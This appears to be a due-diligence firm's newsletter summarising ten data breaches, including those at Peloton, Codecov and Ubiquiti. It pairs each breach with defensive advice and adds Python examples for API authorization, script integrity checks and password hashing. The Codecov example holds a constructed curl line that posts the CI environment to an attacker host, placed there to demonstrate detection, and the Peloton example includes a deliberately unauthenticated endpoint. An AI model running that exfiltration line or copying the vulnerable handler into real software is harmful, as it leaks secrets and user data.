
Industry News: ESG5

    Know Your Breach: Bergen Logistics

    The target: Bergen Logistics, a U.S.-based fulfillment provider.

    The take: Personally identifiable information including names, surnames, city, zip code, street addresses, order numbers, email addresses, and plain-text passwords for customer accounts.

    The attack vector: An unsecured Elasticsearch database server was left online, meaning anyone with an internet connection was able to connect and download the data.

    The exposure of personal information enables highly targeted phishing and fraud. More serious was that the firm stored customer account passwords in plain text, with no hashing or other protection, so the exposure handed an attacker working credentials. Passwords should never be stored in a recoverable form: the standard practice is a salted, deliberately slow hash (bcrypt, scrypt or Argon2, for example), so that a database exposure does not also expose the credentials themselves. Protecting stored credentials in this way is an integral part of maintaining a robust cybersecurity posture.

    Know Your Breach: FastTrack

    The target: FastTrack Reflex Recruitment, a U.K.-based online recruitment firm.

    The take: Exposure of 20,000 records of personally identifiable information including email addresses, home addresses, full names, phone numbers, dates of birth, and passport photos.

    The attack vector: The information was exposed due to a misconfigured cloud storage account, allowing anyone with an internet connection to access and download a full copy of the details.

    Leaving data stores exposed to the internet without any access control compromises their confidentiality, integrity, and availability. Cloud storage should be private by default, with access granted only to authenticated and authorized identities, and public-access settings should be audited regularly rather than assumed. Where user accounts front the data, industry-standard practices of password length, complexity, two-factor authentication, and email verification raise the level of protection for sensitive information.

    Know Your Breach: Fermilab

    The target: Fermilab, the U.S.-based particle physics laboratory.

    The take: Exposure of databases containing proprietary documents, project names, configuration files, passwords, and personally identifiable information such as employee names and email addresses.

    The attack vector: Security researchers found open ports on Fermilab's internet-facing systems and used these unprotected services to reach its IT ticketing support system and file transfer service. This exposed employee names and titles, as well as many sensitive documents attached to individual help tickets. The file transfer service was also online with no password protection at all.

    This breach highlights the importance of credential management and of thoroughly testing every point of access into a firm's IT systems. Every internet-facing service should require authentication, backed by robust password controls of appropriate length and complexity, and exposed ports and services should be inventoried and monitored so that nothing is reachable without protection by accident.

    Know Your Breach: Peloton

    The target: Peloton, an exercise equipment manufacturer.

    The take: Exposure of personally identifiable information for an unknown number of its 3 million users, such as user ID, instructor ID, location, workout statistics, gender and age, and studio check-ins.

    The attack vector: The leak occurred because the API endpoints behind Peloton's mobile app, website, and back end lacked authentication and authorization controls (an API, or Application Programming Interface, is the software interface through which two applications exchange data). Anyone able to send a crafted request to these endpoints could retrieve profile information for Peloton users, even when those profiles were marked 'private', without ever logging in.

    This breach highlights the critical importance of robust authentication and authorization whenever user data is requested or transferred through a firm's publicly reachable IT systems: every endpoint must verify who is asking and whether that caller is entitled to the specific record requested. Thorough testing of these controls, including requests sent with no credentials and with another user's credentials, is an integral part of maintaining a rigorous cybersecurity posture. Exposed personal data enables highly effective phishing attacks and further breaches of a firm's customers.
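    The pattern described above, as an added example that is not Peloton's code: a profile endpoint that trusts the requested ID and never looks at the caller, beside one that authenticates the caller and then authorizes access to the specific record, together with the kind of unauthenticated probe a tester would run against both. The data model, endpoint shape, session store and token format are assumptions for this demonstration.

```python
"""Added example, not Peloton's code: a profile endpoint that ignores the caller
next to one that authenticates the caller and authorizes access to the specific
record. The data model, endpoint shape and token format are assumptions."""
from dataclasses import dataclass


@dataclass
class Profile:
    user_id: int
    username: str
    location: str
    private: bool
    workouts: int


# Constructed sample users: one private profile, one public.
PROFILES = {
    1: Profile(1, "alice", "Austin, TX", private=True, workouts=120),
    2: Profile(2, "bob", "Boston, MA", private=False, workouts=15),
}

# Constructed session store: bearer token -> authenticated user_id.
SESSIONS = {"tok-alice": 1, "tok-bob": 2}

SENSITIVE_FIELDS = ("location", "workouts")


def full_view(p: Profile) -> dict:
    return {"user_id": p.user_id, "username": p.username,
            "location": p.location, "workouts": p.workouts}


def public_view(p: Profile) -> dict:
    """Fields a stranger may see on a non-private profile."""
    return {"user_id": p.user_id, "username": p.username}


def vulnerable_get_profile(user_id: int, headers: dict) -> tuple[int, dict]:
    """Before: trusts the requested ID and never asks who is calling."""
    p = PROFILES.get(user_id)
    if p is None:
        return 404, {"error": "not found"}
    return 200, full_view(p)


def hardened_get_profile(user_id: int, headers: dict) -> tuple[int, dict]:
    """After: authenticate the caller, then authorize against the record."""
    # 1. Authentication: a valid bearer token identifies the caller.
    auth = headers.get("Authorization", "")
    caller = SESSIONS.get(auth[len("Bearer "):]) if auth.startswith("Bearer ") else None
    if caller is None:
        return 401, {"error": "authentication required"}
    # 2. Object-level authorization: what may *this* caller see of *this* record?
    p = PROFILES.get(user_id)
    if p is None or (p.private and caller != p.user_id):
        # Same response as a missing record, so the endpoint does not
        # confirm which IDs exist behind the privacy setting.
        return 404, {"error": "not found"}
    return 200, full_view(p) if caller == p.user_id else public_view(p)


def audit_unauthenticated_access(handler) -> list[int]:
    """Probe every known ID with no credentials and report the IDs whose
    sensitive fields came back; the expected result is an empty list."""
    leaked = []
    for uid in PROFILES:
        status, body = handler(uid, {})
        if status == 200 and any(f in body for f in SENSITIVE_FIELDS):
            leaked.append(uid)
    return leaked


if __name__ == "__main__":
    print("vulnerable leaks:", audit_unauthenticated_access(vulnerable_get_profile))
    print("hardened leaks:", audit_unauthenticated_access(hardened_get_profile))
```

    The hardened handler makes two separate decisions, and a real test suite should exercise both: a request with no token, and a request with a valid token for a different user. Returning the same "not found" response for a private profile and for a nonexistent ID stops the endpoint from leaking which IDs exist.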

    Know Your Breach: First Horizon Bank

    The target: First Horizon Bank, a U.S.-based financial services company.

    The take: Up to $1 million USD, and the personally identifiable information held in roughly 200 online customer accounts.

    The attack vector: The attacker used stolen login credentials and exploited a vulnerability in third-party security software to access customer accounts and siphon funds. In addition to the funds stolen, the detailed personal data exposed is highly valuable for further phishing and fraud attacks.

    This breach emphasizes the importance of controls around the authentication process: requirements for strong, unique credentials, and multiple factors of authentication wherever possible, so that a stolen or brute-forced password is not enough on its own. Third-party software components in an authentication path must also be deployed correctly, with security patches tested and applied promptly to maintain a secure posture.

    Know Your Breach: Codecov

    The target: Codecov, a software company providing code coverage reporting and statistics.

    The take: Security tokens and keys for 29,000 customers and employees, admin credentials, and application source code.

    The attack vector: Attackers gained access to Codecov's 'Bash Uploader' script, which clients and employees run in their build pipelines to upload data to Codecov's servers, through a previously unknown vulnerability that let them extract credentials with authority to modify the script. They then altered the script so that data sent to Codecov was also sent to a server they controlled. Because the script is downloaded and executed as part of users' build pipelines, every pipeline that ran the modified version was leaking whatever it uploaded, including CI environment variables and tokens.

    This breach highlights the importance of securing and testing every application and process that touches a firm's data, including third-party scripts and tools pulled into build pipelines. Wherever information is uploaded, whether by clients or employees, the method should be scrutinized against industry standards: fetch tooling at a pinned version, verify its integrity (checksum or publisher signature) before executing it, and scope the credentials available to it so that a compromised upload step cannot expose unrelated secrets.
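    As an added example (not Codecov's tooling and not the real uploader), the integrity gate a pipeline can put in front of a fetched script: compare its digest against a value pinned at review time, and, as a secondary review aid, flag any line that ships data to a host outside an allowlist. The script text, the appended exfiltration line, the pinned digest and the host names (all under the reserved `.invalid` domain) are constructed for this demonstration.

```python
"""Added example, not Codecov's tooling: check a downloaded uploader script
against a digest pinned at review time before executing it, and flag any line
that ships data somewhere other than the expected host. The script text, the
injected line and the host names (*.invalid) are constructed for this demo."""
import hashlib
import hmac
import re

# Constructed stand-in for the published uploader, as reviewed and pinned.
CLEAN_SCRIPT = b"""#!/usr/bin/env bash
set -euo pipefail
# Upload the coverage report produced by the build.
curl -sS -X POST --data-binary @coverage.xml "https://uploader.example.invalid/v1/upload?token=$CI_TOKEN"
"""

# Digest recorded when the script was reviewed; in a real pipeline this
# constant lives in the repository, not next to the download.
PINNED_SHA256 = hashlib.sha256(CLEAN_SCRIPT).hexdigest()

# Constructed tampered copy: one appended line also posts the CI environment
# (tokens, keys) to an attacker-controlled host.
TAMPERED_SCRIPT = CLEAN_SCRIPT + (
    b'curl -sS -X POST --data "$(env)" https://collector.attacker.invalid/env\n'
)

URL_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def verify_script(content: bytes, pinned_sha256: str) -> bool:
    """Primary gate: refuse anything whose digest does not match the pin."""
    actual = hashlib.sha256(content).hexdigest()
    return hmac.compare_digest(actual, pinned_sha256)


def egress_violations(content: bytes, allowed_hosts: set[str]) -> list[str]:
    """Secondary review aid: lines that reference a host outside the allowlist.
    Cheap and bypassable (obfuscated hosts, DNS tricks), so it supplements the
    digest check rather than replacing it."""
    bad = []
    for line in content.splitlines():
        hosts = {h.decode() for h in URL_RE.findall(line)}
        if hosts - allowed_hosts:
            bad.append(line.decode())
    return bad


def safe_to_run(content: bytes, pinned_sha256: str, allowed_hosts: set[str]) -> bool:
    """Gate a pipeline step on both checks; the caller executes only on True."""
    return verify_script(content, pinned_sha256) and not egress_violations(content, allowed_hosts)


if __name__ == "__main__":
    allowed = {"uploader.example.invalid"}
    print("clean   :", safe_to_run(CLEAN_SCRIPT, PINNED_SHA256, allowed))
    print("tampered:", safe_to_run(TAMPERED_SCRIPT, PINNED_SHA256, allowed))
    for line in egress_violations(TAMPERED_SCRIPT, allowed):
        print("  unexpected egress:", line)
```

    The digest is the control that actually holds: any change to the script, however small, fails the comparison. The pin must be updated deliberately, on a review of the new version, and where the publisher offers a signature that check belongs alongside the digest. The egress scan is only a reviewer's aid, since a determined attacker can hide a destination from a regular expression.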

    Know Your Breach: Kentucky Career Centre

    The target: The Kentucky Office of Unemployment Insurance.

    The take: Unauthorized access to claimant accounts, which allowed the attackers to alter the destination bank accounts for benefit payments and redirect the funds to fraudsters.

    The attack vector: Attackers leveraged weak password hygiene and the absence of modern credential management in the Unemployment Office's IT systems. It was reported that some 4,000 users had created passwords such as "1-2-3-4" and 1,500 had used the phrase "2020"; passwords like these fall to ordinary password-guessing tools with trivial computing effort.

    Enforcing strong password management across all platforms is critical to protecting customer data. Industry-standard practices of password length, complexity, two-factor authentication, and email verification are only effective if they are enforced at the point where a password is set, for example by rejecting entries that appear on a denylist of common and previously breached passwords, and if weak passwords already in use are retired. Doing so ensures users, and their data, are protected as far as possible.
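    As an added example serving both this passage and the Bergen Logistics item above (it is not code from either organization), a registration path that rejects passwords of the kind reported here at the moment they are set, and stores the accepted ones only as salted, iterated PBKDF2 hashes rather than in plain text. Standard library only; the denylist, the minimum length, the iteration count and the sample candidates are assumptions chosen for this demonstration.

```python
"""Added example, not code from any of the firms above: reject weak passwords at
the point they are set and store accepted ones only as salted PBKDF2 hashes.
Standard library only; denylist, minimum length and work factor are assumed."""
import hashlib
import hmac
import os
import re

MIN_LENGTH = 12
PBKDF2_ITERATIONS = 600_000          # PBKDF2-HMAC-SHA256 work factor (assumed)
# Constructed denylist; a real deployment loads a breach-derived list.
COMMON_PASSWORDS = {"password", "1234", "12345678", "qwerty", "2020", "letmein"}
YEAR_RE = re.compile(r"(19|20)\d\d")
SEPARATORS_RE = re.compile(r"[\s\-_.]")


def policy_violations(password: str, username: str = "") -> list[str]:
    """Return the rules a candidate password breaks; empty means acceptable.
    Separators are stripped first so '1-2-3-4' is judged as '1234'."""
    norm = SEPARATORS_RE.sub("", password).lower()
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("too_short")
    if norm in COMMON_PASSWORDS:
        problems.append("denylisted")
    if norm.isdigit():
        problems.append("digits_only")
    if YEAR_RE.search(norm):
        problems.append("contains_year")
    if username and username.lower() in norm:
        problems.append("contains_username")
    return problems


def hash_password(password: str) -> str:
    """Salted, iterated hash; the stored string carries its own parameters so
    the work factor can be raised later without breaking old records."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison


def register(username: str, password: str) -> str:
    """Enforce the policy, then return the record to store (never the password)."""
    problems = policy_violations(password, username)
    if problems:
        raise ValueError("password rejected: " + ", ".join(problems))
    return hash_password(password)


if __name__ == "__main__":
    for candidate in ("1-2-3-4", "Summer2020!", "correct horse battery staple"):
        print(f"{candidate!r}: {policy_violations(candidate) or 'ok'}")
    record = register("claimant42", "correct horse battery staple")
    print("stored:", record[:40] + "...")
    print("verify right:", verify_password("correct horse battery staple", record))
    print("verify wrong:", verify_password("1-2-3-4", record))
```

    Two design points matter in practice. The policy check normalizes separators before consulting the denylist, because "1-2-3-4" is the same guess as "1234" to an attacker. The stored record embeds the algorithm, iteration count and salt, so the work factor can be raised for new or re-hashed records without a migration, and the comparison is constant-time. A production system would swap PBKDF2 for bcrypt, scrypt or Argon2 where those libraries are available; the structure stays the same.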

    Know Your Breach: Office Depot

    The target: Office Depot, a European online seller of office equipment.

    The take: 974,050 wide-ranging records of sensitive information including monitoring logs, server IP addresses, secure remote login credentials, and customers' personally identifiable information such as names, physical addresses, and order history.

    The attack vector: A non-password-protected, unencrypted Elasticsearch database was left online, allowing anyone who found its address to read the information from a browser.

    Leaving databases exposed to the internet without any credential management compromises their confidentiality, integrity, and availability. Furthermore, collecting and storing sensitive data in plain text increases the risk to clients. Encryption at rest only helps when the keys are managed separately: if the credentials or keys needed to read the data sit on the same server, the encryption is rendered ineffective. Proper control over access credentials, together with sound encryption and key-management practice, is essential to keeping data secure.

    Know Your Breach: Ubiquiti

    The target: Ubiquiti, a major vendor of cloud-enabled networking devices. 

    The take: Source code, customer data, and cryptographic secrets which would enable remote access to both professional and consumer-grade customer devices.

    The attack vector: The attackers gained control of administrative credentials stored in an IT employee's LastPass account. With these in hand, the threat actors gained high-level access to Ubiquiti's Amazon Web Services accounts, including database storage, application logs, and user credentials. Multiple backdoor accounts were reportedly created. A whistleblower alleged that, because database access logging was absent, Ubiquiti was unable to confirm which records had been accessed, by whom, or when.

    While password vaults and privileged access management tools are absolutely best practice, they are only as secure as the authentication enforced on them. Complex, unique passwords plus two-factor authentication should protect privileged credentials and management consoles wherever possible, and privileged cloud credentials should be short-lived where the platform supports it, so that a stolen secret has limited value.

    Additionally, comprehensive logging is critical to reconstructing events when investigating a breach, and its absence can severely limit a firm's ability to determine the full scope of an attack.

    Know Your Breach: SCO

    The target: The California State Controller's Office (SCO).

    The take: Financial and personally identifiable information and documents, such as Social Security numbers, on several thousand employees.

    The attack vector: An employee, targeted by a spear-phishing email, clicked on the link and entered their account ID/email address and password on the attacker's page. This gave the attacker access to SCO's systems with the same level of access as the employee, including any files shared with the affected account. From there, the attacker launched further phishing attempts against over 9,000 employees, using the compromised account to make the scam more believable.

    Phishing attacks against individual employees remain one of the greatest security threats to an entire organization. Regular social-engineering testing and awareness training, along with tone-from-the-top messaging that emphasizes critical thinking and caution, are crucial to protecting sensitive information assets. Multi-factor authentication on the accounts concerned also limits what a harvested password alone can achieve.

    About Castle Hall Diligence

    Castle Hall helps investors build comprehensive due diligence programs across hedge fund, private equity and long-only portfolios.
